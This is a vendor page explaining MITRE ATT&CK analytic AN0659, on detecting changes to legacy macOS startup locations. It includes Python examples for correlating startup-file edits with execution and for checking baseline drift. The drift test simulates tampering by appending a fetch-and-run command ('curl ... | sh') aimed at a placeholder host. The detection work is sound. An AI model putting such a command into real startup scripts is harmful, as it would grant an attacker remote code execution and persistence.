AN0659: Analytic 0659
Detection of edits or additions to /etc/rc.common, /Library/StartupItems, or /System/Library/StartupItems and associated script execution during login or reboot.
Analyst context for executives and security teams
This analytic is about spotting persistence-related changes on macOS by monitoring edits or additions to legacy startup locations and associated script execution during login or reboot. For leaders, the value is not the specific file paths alone; it is whether the organization can prove that macOS startup behavior is monitored well enough to support fast containment and reliable incident reconstruction.
Executive priority
Prioritize this where macOS endpoints support business-critical users, administrators, developers, or regulated workflows. The decision point is whether endpoint monitoring, SOC triage, and incident response playbooks can identify unauthorized startup modifications before they become a long-lived foothold. This can also support audit and compliance evidence by showing that persistence-relevant system changes are logged, reviewed, and investigated.
Technical view
Validate monitoring for macOS edits or additions to /etc/rc.common, /Library/StartupItems, and /System/Library/StartupItems, plus script execution associated with login or reboot. Because the ATT&CK object provides no official detection logic and no relationship context, detection engineers should treat this as a coverage requirement rather than a ready-to-run rule. SOC and IR teams should confirm they can correlate file modification events with subsequent process/script execution around login or system reboot timelines.
Likely telemetry
- macOS file creation, modification, and permission-change events for /etc/rc.common, /Library/StartupItems, and /System/Library/StartupItems
- Endpoint process execution telemetry for scripts or commands launched during login or reboot
- User, host, and timestamp context for correlating startup file changes to later execution
- Endpoint security or EDR alerts related to startup item changes, if available
- System logs that can help reconstruct login and reboot activity
Detection direction
- Confirm the monitored platform scope is macOS; do not assume this analytic applies to other operating systems.
- Build or validate detections for additions or edits in the specified startup paths, then correlate with script execution during login or reboot.
- Tune for legitimate administrative or software-maintenance activity to reduce false positives, but require change context for unusual or unauthorized modifications.
- Pay special attention to blind spots where file monitoring is disabled, endpoint agents lack full-disk visibility, or reboot/login execution telemetry is not retained.
- Because no official detection query is provided, test locally with benign change simulations and verify that alerts include enough context for triage.
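The correlation the technical view and the detection direction describe, as an added example (not MITRE or Glexia code): it takes file-write, boot/login and process events, keeps only writes to the startup paths the analytic names, drops writes by an assumed allowlist of maintenance binaries, and then looks for execution of the edited file within a window after the next boot or login on the same host. The event schema, the allowlist, the window length and the sample telemetry are all constructed assumptions standing in for whatever your EDR or endpoint-security agent actually emits.

```python
"""Correlate edits to legacy macOS startup locations with script execution
after the next login or reboot.  Added example; field names, the allowlist,
the correlation window and the sample events are assumptions, not a vendor
schema."""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List

# Startup locations named by the analytic.
RC_COMMON = "/etc/rc.common"
WATCHED_DIRS = ("/Library/StartupItems/", "/System/Library/StartupItems/")

# Assumed allowlist of writers that legitimately touch these paths; tune locally.
ALLOWED_WRITERS = {"/usr/sbin/installer", "/usr/sbin/softwareupdate"}

# How long after a boot/login an execution still counts as "startup" activity (assumed).
CORRELATION_WINDOW = timedelta(minutes=10)


@dataclass
class Event:
    ts: datetime
    host: str
    kind: str           # "file_write", "boot", "login" or "process"
    path: str = ""      # file written (file_write) or image executed (process)
    process: str = ""   # writing process image (file_write)
    user: str = ""
    cmdline: str = ""   # full command line (process)


def is_watched(path: str) -> bool:
    """True for /etc/rc.common itself or anything under the StartupItems directories."""
    return path == RC_COMMON or path.startswith(WATCHED_DIRS)


def correlate(events: List[Event]) -> List[Dict]:
    """One finding per non-allowlisted edit of a watched path.

    Severity is 'high' when the edited file is executed (as the image or on a
    command line) within CORRELATION_WINDOW of the next boot or login on the
    same host, and 'medium' when the edit is seen but no startup execution follows.
    """
    events = sorted(events, key=lambda e: e.ts)
    findings = []
    for edit in events:
        if edit.kind != "file_write" or not is_watched(edit.path):
            continue
        if edit.process in ALLOWED_WRITERS:
            continue  # expected maintenance activity: audit trail, not alert queue
        # First login or reboot on this host after the edit.
        restart = next((e for e in events if e.host == edit.host
                        and e.kind in ("boot", "login") and e.ts > edit.ts), None)
        executions = []
        if restart is not None:
            deadline = restart.ts + CORRELATION_WINDOW
            executions = [e for e in events
                          if e.host == edit.host and e.kind == "process"
                          and restart.ts <= e.ts <= deadline
                          and (e.path == edit.path or edit.path in e.cmdline)]
        findings.append({
            "host": edit.host,
            "path": edit.path,
            "writer": edit.process,
            "user": edit.user,
            "edited_at": edit.ts.isoformat(),
            "restart": restart.kind if restart else None,
            "executed": [e.cmdline or e.path for e in executions],
            "severity": "high" if executions else "medium",
        })
    return findings


def _t(s: str) -> datetime:
    return datetime.fromisoformat(s)


# Constructed telemetry for three hosts; not captured from any real system.
SAMPLE_EVENTS = [
    # mac-01: interactive shell writes a startup item, host reboots, item runs.
    Event(_t("2024-05-01T09:00:00"), "mac-01", "file_write",
          path="/Library/StartupItems/Updater/Updater", process="/bin/bash", user="jdoe"),
    Event(_t("2024-05-01T09:30:00"), "mac-01", "boot"),
    Event(_t("2024-05-01T09:30:40"), "mac-01", "process", path="/bin/sh",
          cmdline="/bin/sh /Library/StartupItems/Updater/Updater start"),
    # mac-02: allowlisted installer edits rc.common; suppressed by tuning.
    Event(_t("2024-05-01T10:00:00"), "mac-02", "file_write",
          path=RC_COMMON, process="/usr/sbin/installer", user="root"),
    Event(_t("2024-05-01T10:05:00"), "mac-02", "boot"),
    # mac-03: editor writes an item; unrelated process before login, nothing after.
    Event(_t("2024-05-01T11:00:00"), "mac-03", "file_write",
          path="/System/Library/StartupItems/Cache/Cache", process="/usr/bin/vim", user="admin"),
    Event(_t("2024-05-01T11:20:00"), "mac-03", "process", path="/usr/bin/python3",
          cmdline="/usr/bin/python3 /tmp/unrelated.py"),
    Event(_t("2024-05-01T11:30:00"), "mac-03", "login", user="admin"),
]


def demo() -> List[Dict]:
    return correlate(SAMPLE_EVENTS)


if __name__ == "__main__":
    for f in demo():
        print(f["severity"], f["host"], f["path"], f["writer"], f["executed"])
```

Every finding carries the host, writer, user, edit time and the executed command line, which is the triage context the last bullet asks for. The allowlist deliberately keys on the writing process rather than the user, because an administrator's shell editing a StartupItem is exactly the case that should surface.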
Mitigation priorities
- Establish baseline ownership, permissions, and expected contents for the specified macOS startup locations.
- Limit administrative write access to startup-related system paths and review exceptions regularly.
- Ensure endpoint logging and retention cover both file changes and associated execution events across macOS systems in scope.
- Create IR procedures for validating whether a startup item change is authorized, removing unauthorized entries, and reviewing nearby login or reboot execution history.
- Use compliance or control testing to demonstrate that persistence-relevant macOS system changes are visible and actionable.
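A baseline of ownership, permissions and expected contents for the startup locations, as an added example (not MITRE or Glexia code): it records mode, uid, gid and a SHA-256 of every file under the named roots, records a root that does not exist as absent so that its later creation is itself a finding, and diffs a fresh manifest against the stored one. The default root list comes from the analytic; the scratch directory in `self_check` is a constructed stand-in for a StartupItems directory so the check runs on any POSIX host without touching real system paths.

```python
"""Baseline and drift check for macOS legacy startup locations.
Added example; the root list is the analytic's, the scratch scenario is constructed."""
import hashlib
import os
import shutil
import stat
import tempfile
from typing import Dict, Iterable, List

STARTUP_ROOTS = ("/etc/rc.common", "/Library/StartupItems", "/System/Library/StartupItems")


def _record(path: str) -> Dict:
    """Ownership, permission bits and, for regular files, a content hash."""
    st = os.lstat(path)
    if stat.S_ISDIR(st.st_mode):
        kind = "dir"
    elif stat.S_ISLNK(st.st_mode):
        kind = "symlink"
    else:
        kind = "file"
    rec = {"type": kind, "mode": stat.S_IMODE(st.st_mode), "uid": st.st_uid, "gid": st.st_gid}
    if kind == "symlink":
        rec["target"] = os.readlink(path)  # a retargeted link is a content change too
    elif stat.S_ISREG(st.st_mode):
        with open(path, "rb") as fh:
            rec["sha256"] = hashlib.sha256(fh.read()).hexdigest()
    return rec


def build_manifest(roots: Iterable[str] = STARTUP_ROOTS) -> Dict[str, Dict]:
    manifest: Dict[str, Dict] = {}
    for root in roots:
        if not os.path.lexists(root):
            manifest[root] = {"type": "absent"}  # appearance later is a change
            continue
        manifest[root] = _record(root)
        if os.path.isdir(root) and not os.path.islink(root):
            for dirpath, dirnames, filenames in os.walk(root):
                for name in dirnames + filenames:
                    p = os.path.join(dirpath, name)
                    manifest[p] = _record(p)
    return manifest


def diff_manifests(baseline: Dict[str, Dict], current: Dict[str, Dict]) -> Dict[str, List]:
    """Paths added, removed, or changed (with the names of the fields that differ)."""
    out: Dict[str, List] = {"added": [], "removed": [], "changed": []}
    for p in sorted(set(baseline) | set(current)):
        b, c = baseline.get(p), current.get(p)
        if b is None:
            out["added"].append(p)
        elif c is None:
            out["removed"].append(p)
        elif b != c:
            fields = sorted(k for k in set(b) | set(c) if b.get(k) != c.get(k))
            out["changed"].append((p, fields))
    return out


def self_check() -> Dict[str, List]:
    """Constructed scenario: baseline a scratch StartupItems tree, then tamper with it."""
    root = tempfile.mkdtemp()
    try:
        missing = os.path.join(root, "missing")
        item = os.path.join(root, "Updater")
        os.mkdir(item)
        script = os.path.join(item, "Updater")
        with open(script, "w") as fh:
            fh.write("#!/bin/sh\necho start\n")
        os.chmod(script, 0o755)
        baseline = build_manifest([root, missing])
        # Tamper: append to the script, loosen its mode, drop a new file, create the absent root.
        with open(script, "a") as fh:
            fh.write("curl http://example.invalid/x | sh\n")
        os.chmod(script, 0o777)
        with open(os.path.join(item, "Extra"), "w") as fh:
            fh.write("x")
        os.mkdir(missing)
        d = diff_manifests(baseline, build_manifest([root, missing]))
        rel = lambda p: os.path.relpath(p, root)
        return {"added": [rel(p) for p in d["added"]],
                "removed": [rel(p) for p in d["removed"]],
                "changed": [(rel(p), f) for p, f in d["changed"]]}
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    print(self_check())
```

In production, store the manifest from `build_manifest()` off-host (an attacker with root can rewrite a local baseline) and run the diff from a scheduled job; the field list on each changed entry tells the responder whether the drift is a permission or ownership change only, or a content change that warrants pulling the file.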
Analyst notes and limits
This Glexia take is based only on the supplied ATT&CK analytic fields. The object identifies macOS startup file locations and associated login or reboot script execution as the behavior of interest, but it does not provide tactics, relationships, sample detection logic, malware/tool context, or mitigation mappings.
No official detection content or relationship context was supplied, so this summary cannot assert specific ATT&CK techniques, adversary use, coverage quality, impact, or active exploitation. Local environment baselines, endpoint telemetry quality, and authorized administrative workflows are required to turn this into a reliable production detection.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see the ATT&CK resources "Updates" page.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | c4cc6f02d20d… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
[1] mitre-attack: AN0659 (source URL)
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.